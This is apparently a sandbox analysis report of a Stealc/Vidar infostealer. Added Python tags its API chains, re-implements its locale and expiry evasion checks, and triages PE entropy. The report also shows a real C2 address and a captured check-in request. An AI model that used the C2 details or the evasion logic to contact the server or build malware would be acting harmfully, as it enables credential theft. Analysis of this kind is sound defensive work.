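    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_003C9860",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9750 mov eax, dword ptr fs:[00000030h]0_2_003C9750",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003C9600",
    r"Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C7B90",
    r"Source: C:\Users\user\Desktop\file.exeCode function: 0_2_003C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C6920",
]

# The function id (pid_run_address) may lead the body and is always repeated at the end.
LINE_RE = re.compile(r"Code function: (?:(?P<fn>\d+_\d+_[0-9A-Fa-f]+) )?(?P<body>.*)$")
TRAIL_RE = re.compile(r"(\d+_\d+_[0-9A-Fa-f]+)\s*$")
HEX_RE = re.compile(r"[0-9A-Fa-f]+")          # numeric arguments such as 00000004


def parse_code_function(line: str) -> Optional[Tuple[str, List[str], bool]]:
    """Return (function_id, api_names, reads_peb) or None for other signature types."""
    m = LINE_RE.search(line)
    if not m:
        return None
    fn, body = m.group("fn"), m.group("body").rstrip()
    if fn and body.endswith(fn):
        body = body[:-len(fn)]              # drop the repeated id (it may be glued to the last arg)
    else:
        tail = TRAIL_RE.search(body)
        if not tail:
            return None
        fn, body = tail.group(1), body[:tail.start()]
    body = body.rstrip(",")
    reads_peb = "fs:[00000030h]" in body    # inline asm line, not an API list
    apis: List[str] = []
    if not reads_peb:
        for tok in body.split(","):
            name = tok.strip().split()[0] if tok.strip() else ""
            if name and not HEX_RE.fullmatch(name):
                apis.append(name)
    return fn, apis, reads_peb


def tag_function(apis: List[str], reads_peb: bool) -> List[str]:
    """Map an API chain to behaviour tags; order is fixed so results compare cleanly."""
    c = Counter(apis)
    tags = []
    if reads_peb:
        tags.append("peb_access")
    if c["FindFirstFileA"] and c["CopyFileA"]:
        tags.append("file_harvest")          # enumerate, copy out, delete: grabber loop
    elif c["FindFirstFileA"] and c["FindNextFileA"]:
        tags.append("file_enum")
    if c["CreateToolhelp32Snapshot"] and c["Process32Next"]:
        tags.append("process_enum")
    if c["GetProcAddress"] >= 5:             # threshold chosen by the editor
        tags.append("dynamic_api_resolution")
    if c["GetKeyboardLayoutList"] or c["GetLocaleInfoA"]:
        tags.append("locale_check")
    if c["GetSystemTime"] and c["ExitProcess"]:
        tags.append("timed_exit")
    if c["VirtualProtect"]:
        tags.append("memory_protection_change")
    return tags


def classify(lines: List[str]) -> Dict[str, List[str]]:
    result: Dict[str, List[str]] = {}
    for line in lines:
        parsed = parse_code_function(line)
        if parsed:
            fn, apis, reads_peb = parsed
            result[fn] = tag_function(apis, reads_peb)
    return result


if __name__ == "__main__":
    for fn, tags in classify(REPORT_LINES).items():
        print(fn, ", ".join(tags) or "(untagged)")
```

Feeding the whole report through classify() gives one tagged row per function; the addresses (0x3B0000 image, 0x3Bxxxx and 0x3Cxxxx functions) line up with the unpacked PE that the Yara rules match, which is where a detection engineer would start carving strings or writing a rule.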

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5476, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_003C9600
Source: file.exe, 00000000.00000002.2238243555.0000000000795000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: MProgram Manager
Source: file.exe | Binary or memory string: MProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_003C7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C6920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,0_2_003C6920
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_003C7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003C7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_003C7A30
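Two of the functions above decide whether the stealer runs at all. 0_2_003C7B90 calls GetKeyboardLayoutList twice (once for the count, once for the handles) and GetLocaleInfoA, which is the "may stop execution after checking locale" signature from the overview; 0_2_003C6920 parses a date with sscanf, converts both it and GetSystemTime's result with SystemTimeToFileTime and calls ExitProcess, an expiry kill-switch that makes old builds exit. The Python below re-implements that decision logic as an added example so an analyst can reason about it; it is not the sample's code. The set of blocked primary language IDs and the sscanf date format are assumptions, because the report shows the API chain and not the constants.

```python
"""Re-implementation of the two run/exit gates visible in this report (added
example, not the sample's code): the keyboard-layout locale check of
0_2_003C7B90 and the sscanf/SystemTimeToFileTime expiry check of 0_2_003C6920.
Which languages are blocked and the date format are ASSUMED."""
from datetime import datetime, timezone
from typing import Iterable, Set

# ASSUMED for illustration: primary language IDs treated as "do not run".
# 0x19 Russian, 0x22 Ukrainian, 0x23 Belarusian, 0x3F Kazakh.
BLOCKED_PRIMARY_LANGIDS: Set[int] = {0x19, 0x22, 0x23, 0x3F}


def primary_langid(hkl: int) -> int:
    """An HKL returned by GetKeyboardLayoutList carries the input LANGID in
    its low 16 bits; the primary language is the low 10 bits of the LANGID
    (sub-language in the top 6), so 0x04190419 (ru-RU) -> 0x19."""
    return (hkl & 0xFFFF) & 0x3FF


def locale_blocked(hkls: Iterable[int], blocked: Set[int] = BLOCKED_PRIMARY_LANGIDS) -> bool:
    """True if any installed keyboard layout belongs to a blocked language."""
    return any(primary_langid(h) in blocked for h in hkls)


_FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def to_filetime(dt: datetime) -> int:
    """SystemTimeToFileTime equivalent: 100 ns ticks since 1601-01-01 UTC.
    Integer arithmetic keeps the 17-digit result exact (float would not)."""
    delta = dt - _FILETIME_EPOCH
    return (delta.days * 86_400 + delta.seconds) * 10_000_000 + delta.microseconds * 10


def parse_deadline(text: str) -> datetime:
    """ASSUMED sscanf format "%d.%d.%d" read as day.month.year."""
    day, month, year = (int(part) for part in text.split("."))
    return datetime(year, month, day, tzinfo=timezone.utc)


def build_expired(now: datetime, deadline: str) -> bool:
    """The FILETIME comparison the two SystemTimeToFileTime calls feed."""
    return to_filetime(now) > to_filetime(parse_deadline(deadline))


def should_exit(hkls: Iterable[int], now: datetime, deadline: str) -> bool:
    """Either failing gate ends the process; the report does not show which runs first."""
    return locale_blocked(hkls) or build_expired(now, deadline)


if __name__ == "__main__":
    analysis_start = datetime(2024, 10, 8, 12, 31, tzinfo=timezone.utc)   # from the report header
    print("en-US only:", should_exit([0x04090409], analysis_start, "01.11.2024"))
    print("ru-RU present:", should_exit([0x04090409, 0x04190419], analysis_start, "01.11.2024"))
```

The practical consequence for analysis is the second print: a sandbox image with a Russian layout installed, or a system clock past the embedded deadline, produces a clean-looking run with no C2 traffic, which is exactly the report's "Found evasive API chain" warning.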

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5476, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.3b0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5476, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK matrix: techniques with signature hits (number in parentheses = matched signatures; matrix cells without a hit are not listed)

Execution: Command and Scripting Interpreter (2), Native API (11)
Persistence: DLL Side-Loading (1)
Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
Collection: Archive Collected Data (1)
Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact: no hits
Source | Detection | Scanner | Label (initial sample)
file.exe | 100% | Avira | TR/Crypt.TPM.Gen
file.exe | 100% | Joe Sandbox ML |
No Antivirus matches (dropped files, unpacked PE files, domains)
Source | Detection | Scanner | Label (URLs)
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37/ | 100% | URL Reputation | malware
http://185.215.113.37 | 100% | URL Reputation | malware
http://185.215.113.37/e2b1563c6670f193.php | 100% | URL Reputation | malware
No contacted domains info
Contacted URLs: Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | URL Reputation: malware (2 hits) | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | URL Reputation: malware | unknown
URLs from memory and binary strings: Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.370 | file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp | true | URL Reputation: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1528897
                  Start date and time:2024-10-08 12:31:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 86
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  No simulations
Match: 185.215.113.37 (IP). Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
No context
Match: WHOLESALECONNECTIONSNL (ASN). Associated Sample Name | Detection | Threat Name | Context
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
7AeSqNv1rC.exe | malicious | MicroClip, Vidar | 185.215.113.117
file.exe | malicious | Stealc | 185.215.113.37
file.exe | malicious | Stealc, Vidar | 185.215.113.37
No context
No context
                  No created / dropped files found
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.946805946081707
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'847'808 bytes
                  MD5:555446e29069811f705b562473456397
                  SHA1:4545adba658522cf1035be16883def9c888c79e3
                  SHA256:ca41747721e954859ba3e691ac62a90dd426459f5622cdd2729e34c1bc64fdbc
                  SHA512:dbe1dc92ff54a08fe656207c71ce97ed4b0d3a7dda8de91bd2445124dd407124991e7b5e2b2c6b7a0ad02d38ffc26091f977e40e431654e8f965f2547c07b121
                  SSDEEP:49152:3TC4p7SH09Kl2zBDZOJoUH9+uZN3EevX:3x7SHeKl2NDZcowRTX
                  TLSH:538533AD467D7B27CEDFEABB874B9006C7E565B0427D92FB10F43606C419A3D6839028
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                  Icon Hash:00928e8e8686b000
                  Entrypoint:0xa9f000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b
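Two of the fields above are what the overview's "Entry point lies outside standard sections" and the 7.95 bits/byte entropy figure come from: the entry point 0xa9f000 (image base 0x400000 plus an RVA of 0x69f000) falls in a section named .taggant rather than .text, and an entropy that close to 8 means the file body is compressed or encrypted. The code below is an added example, not Joe Sandbox's code: a pure-Python PE header parser that locates the entry point's section and computes per-section and whole-file Shannon entropy, plus a builder that constructs a throwaway PE32 image mirroring the report's numbers so the example runs offline without pefile or the sample. The set of "standard" code-section names and the section-name character rule are my own choices.

```python
"""Static PE triage for the checks this report applies to file.exe: which
section holds the entry point and how high section/file entropy is.
Added example (pure-Python header parsing, not Joe Sandbox's code) with a
builder that constructs a minimal PE32 image for offline use."""
import math
import struct
from typing import List, Tuple

STANDARD_CODE_SECTIONS = {".text", "CODE", ".code", "INIT", ".itext"}   # editor's list


def shannon_entropy(data: bytes) -> float:
    """Bits per byte, 0.0 for constant data and exactly 8.0 for a uniform distribution."""
    if not data:
        return 0.0
    n = len(data)
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    return -sum((c / n) * math.log2(c / n) for c in counts if c) or 0.0


def parse_pe(pe: bytes):
    """Return (image_base, entry_rva, sections) from the DOS/COFF/optional headers."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew, = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    nsect, = struct.unpack_from("<H", pe, e_lfanew + 6)
    size_opt, = struct.unpack_from("<H", pe, e_lfanew + 20)
    opt = e_lfanew + 24
    magic, = struct.unpack_from("<H", pe, opt)
    entry_rva, = struct.unpack_from("<I", pe, opt + 16)
    if magic == 0x10B:                                   # PE32
        image_base, = struct.unpack_from("<I", pe, opt + 28)
    elif magic == 0x20B:                                 # PE32+
        image_base, = struct.unpack_from("<Q", pe, opt + 24)
    else:
        raise ValueError(f"unexpected optional header magic {magic:#x}")
    sections = []
    for i in range(nsect):
        fields = struct.unpack_from("<8sIIIIIIHHI", pe, opt + size_opt + 40 * i)
        name, vsize, va, rawsize, rawptr = fields[:5]
        sections.append({"name": name.rstrip(b"\0").decode("latin-1"), "va": va,
                         "vsize": vsize, "raw": pe[rawptr:rawptr + rawsize],
                         "characteristics": fields[9]})
    return image_base, entry_rva, sections


def triage(pe: bytes) -> dict:
    image_base, entry_rva, sections = parse_pe(pe)
    ep_section = None
    for s in sections:
        if s["va"] <= entry_rva < s["va"] + max(s["vsize"], len(s["raw"])):
            ep_section = s["name"]
    return {
        "entrypoint": image_base + entry_rva,
        "entrypoint_section": ep_section,
        "entrypoint_outside_standard": ep_section not in STANDARD_CODE_SECTIONS,
        "section_entropy": {s["name"]: round(shannon_entropy(s["raw"]), 3) for s in sections},
        "file_entropy": round(shannon_entropy(pe), 3),
        "odd_section_names": [s["name"] for s in sections
                              if not all(ch.isalnum() or ch in "._$" for ch in s["name"])],
    }


def build_pe32(sections: List[Tuple[str, int, bytes, int]], entry_rva: int,
               image_base: int = 0x400000, file_align: int = 0x200) -> bytes:
    """Constructed minimal PE32: enough headers for parse_pe(), not a loadable binary."""
    n = len(sections)
    hdr_end = -(-(0x40 + 4 + 20 + 0xE0 + 40 * n) // file_align) * file_align
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                       # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, n, 0, 0, 0, 0xE0, 0x0102)   # i386, 32-bit exe
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)
    struct.pack_into("<I", opt, 16, entry_rva)
    struct.pack_into("<I", opt, 28, image_base)
    table, body, rawptr = bytearray(), bytearray(), hdr_end
    for name, va, data, chars in sections:
        rawsize = -(-len(data) // file_align) * file_align
        table += struct.pack("<8sIIIIIIHHI", name.encode().ljust(8, b"\0"),
                             len(data), va, rawsize, rawptr, 0, 0, 0, 0, chars)
        body += data.ljust(rawsize, b"\0")
        rawptr += rawsize
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(table)
    return headers.ljust(hdr_end, b"\0") + bytes(body)


# Constructed image mirroring the report's facts: image base 0x400000, entry at
# RVA 0x69F000 inside ".taggant" (0x400000 + 0x69F000 = 0xA9F000), an all-NOP
# .text and a uniformly distributed .taggant payload (entropy exactly 8.0).
SAMPLE_PE = build_pe32(
    [(".text", 0x1000, b"\x90" * 512, 0x60000020),
     (".taggant", 0x69F000, bytes(range(256)) * 16, 0xE0000020)],
    entry_rva=0x69F000,
)

if __name__ == "__main__":
    print(triage(SAMPLE_PE))
```

On the real sample, triage(open("file.exe", "rb").read()) is the check to run before anything dynamic: an entry point in .taggant together with near-8 entropy says the visible PE is a protector envelope, and the unpacked 0.2.file.exe.3b0000.0.unpack dump, not the file on disk, is what the Stealc Yara rules and the string work should target.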
                  Instruction
                  jmp 00007F5ED4D68BFAh
                  movups xmm3, dqword ptr [eax+eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  jmp 00007F5ED4D6ABF5h
                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319
                  Name                                  Virtual Address  Virtual Size  Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT          0x25d050         0x64          .idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC       0x25d1f8         0x8           .idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                  Name       Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity       File Type             Entropy              Characteristics
                  (unnamed)  0x1000           0x25b000      0x22800   50c2b416d8d4faeef21ac8b94afe98cd  unknown   unknown               unknown               unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc      0x25c000         0x1000        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                     empty                 0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata     0x25d000         0x1000        0x200     c60c4959cc8d384ac402730cc6842bb0  False     0.1328125             data                  0.9064079259880791   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  (unnamed)  0x25e000         0x2a3000      0x200     4dd03543d2c1dfb3ae1e233e6dabaabc  unknown   unknown               unknown               unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  xsbjvjcw   0x501000         0x19d000      0x19d000  e6eee176a43ddaf29d428f9d6f130a66  False     0.994823391154661     data                  7.9535443990541745   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  jgzmrfrk   0x69e000         0x1000        0x400     1ce73c1eecd8b7174193ea00ab6575fb  False     0.763671875           data                  5.970532972526244    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant   0x69f000         0x3000        0x2200    7ce881734d52dc90afe9e4bedda19f12  False     0.006433823529411764  DOS executable (COM)  0.019571456231530684 IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  DLL           Import
                  kernel32.dll  lstrcpy
                  Timestamp                         SID      Signature                                        Severity  Source IP    Source Port  Dest IP         Dest Port  Protocol
                  2024-10-08T12:32:11.465876+0200   2044243  ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in  1         192.168.2.6  49727        185.215.113.37  80         TCP
                  Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                  Oct 8, 2024 12:32:10.509358883 CEST  49727        80         192.168.2.6     185.215.113.37
                  Oct 8, 2024 12:32:10.514188051 CEST  80           49727      185.215.113.37  192.168.2.6
                  Oct 8, 2024 12:32:10.514271975 CEST  49727        80         192.168.2.6     185.215.113.37
                  Oct 8, 2024 12:32:10.517584085 CEST  49727        80         192.168.2.6     185.215.113.37
                  Oct 8, 2024 12:32:10.522346973 CEST  80           49727      185.215.113.37  192.168.2.6
                  Oct 8, 2024 12:32:11.209135056 CEST  80           49727      185.215.113.37  192.168.2.6
                  Oct 8, 2024 12:32:11.209291935 CEST  49727        80         192.168.2.6     185.215.113.37
                  Oct 8, 2024 12:32:11.231838942 CEST  49727        80         192.168.2.6     185.215.113.37
                  Oct 8, 2024 12:32:11.236675024 CEST  80           49727      185.215.113.37  192.168.2.6
                  Oct 8, 2024 12:32:11.462222099 CEST  80           49727      185.215.113.37  192.168.2.6
                  Oct 8, 2024 12:32:11.465876102 CEST  49727        80         192.168.2.6     185.215.113.37
                  Oct 8, 2024 12:32:13.717098951 CEST  49727        80         192.168.2.6     185.215.113.37
                  • 185.215.113.37
                  Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                  0           192.168.2.6  49727        185.215.113.37  80                5476  C:\Users\user\Desktop\file.exe
                  Timestamp  Bytes transferred  Direction  Data
                  Oct 8, 2024 12:32:10.517584085 CEST  89  OUT  GET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 8, 2024 12:32:11.209135056 CEST  203  IN  HTTP/1.1 200 OK
                  Date: Tue, 08 Oct 2024 10:32:11 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 8, 2024 12:32:11.231838942 CEST  412  OUT  POST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 36 35 41 38 37 38 32 46 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a
                  Data Ascii:
                    ------AFHDAKJKFCFBGCBGDHCB
                    Content-Disposition: form-data; name="hwid"

                    4965A8782FD72284582127
                    ------AFHDAKJKFCFBGCBGDHCB
                    Content-Disposition: form-data; name="build"

                    doma
                    ------AFHDAKJKFCFBGCBGDHCB--
                  Oct 8, 2024 12:32:11.462222099 CEST  210  IN  HTTP/1.1 200 OK
                  Date: Tue, 08 Oct 2024 10:32:11 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=



                  Target ID:0
                  Start time:06:32:06
                  Start date:08/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x3b0000
                  File size:1'847'808 bytes
                  MD5 hash:555446E29069811F705B562473456397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
